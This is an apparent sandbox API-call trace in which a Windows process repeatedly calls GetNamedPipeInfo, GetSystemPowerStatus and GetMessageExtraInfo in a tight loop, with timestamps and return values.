	[0171.649] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.649] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.649] GetMessageExtraInfo () returned 0x0
	[0171.649] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.649] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.649] GetMessageExtraInfo () returned 0x0
	[0171.649] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.649] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.649] GetMessageExtraInfo () returned 0x0
	[0171.649] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.649] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.649] GetMessageExtraInfo () returned 0x0
	[0171.649] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.649] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.649] GetMessageExtraInfo () returned 0x0
	[0171.649] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.650] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.650] GetMessageExtraInfo () returned 0x0
	[0171.650] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.650] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.650] GetMessageExtraInfo () returned 0x0
	[0171.650] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.650] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.650] GetMessageExtraInfo () returned 0x0
	[0171.650] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.650] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.650] GetMessageExtraInfo () returned 0x0
	[0171.650] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.650] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.650] GetMessageExtraInfo () returned 0x0
	[0171.650] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.650] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.650] GetMessageExtraInfo () returned 0x0
	[0171.650] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.650] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.650] GetMessageExtraInfo () returned 0x0
	[0171.650] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.650] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.650] GetMessageExtraInfo () returned 0x0
	[0171.650] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.650] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.650] GetMessageExtraInfo () returned 0x0
	[0171.650] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.650] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.650] GetMessageExtraInfo () returned 0x0
	[0171.650] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.650] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.650] GetMessageExtraInfo () returned 0x0
	[0171.650] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.650] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.651] GetMessageExtraInfo () returned 0x0
	[0171.651] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.651] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.651] GetMessageExtraInfo () returned 0x0
	[0171.651] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.651] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.651] GetMessageExtraInfo () returned 0x0
	[0171.651] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.651] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.651] GetMessageExtraInfo () returned 0x0
	[0171.651] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.651] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.651] GetMessageExtraInfo () returned 0x0
	[0171.651] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.651] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.651] GetMessageExtraInfo () returned 0x0
	[0171.651] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.651] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.651] GetMessageExtraInfo () returned 0x0
	[0171.651] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.651] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.651] GetMessageExtraInfo () returned 0x0
	[0171.651] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.651] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.651] GetMessageExtraInfo () returned 0x0
	[0171.651] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.651] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.651] GetMessageExtraInfo () returned 0x0
	[0171.651] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.651] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.651] GetMessageExtraInfo () returned 0x0
	[0171.651] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.651] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.651] GetMessageExtraInfo () returned 0x0
	[0171.652] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.652] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.652] GetMessageExtraInfo () returned 0x0
	[0171.652] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.652] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.652] GetMessageExtraInfo () returned 0x0
	[0171.652] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.652] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.652] GetMessageExtraInfo () returned 0x0
	[0171.652] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.652] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.652] GetMessageExtraInfo () returned 0x0
	[0171.652] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.652] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.652] GetMessageExtraInfo () returned 0x0
	[0171.652] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.652] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.652] GetMessageExtraInfo () returned 0x0
	[0171.652] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.652] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.652] GetMessageExtraInfo () returned 0x0
	[0171.652] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.652] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.652] GetMessageExtraInfo () returned 0x0
	[0171.652] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.652] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.652] GetMessageExtraInfo () returned 0x0
	[0171.652] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.652] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.652] GetMessageExtraInfo () returned 0x0
	[0171.652] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.652] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.652] GetMessageExtraInfo () returned 0x0
	[0171.652] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.653] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.653] GetMessageExtraInfo () returned 0x0
	[0171.653] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.653] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.653] GetMessageExtraInfo () returned 0x0
	[0171.653] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.653] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1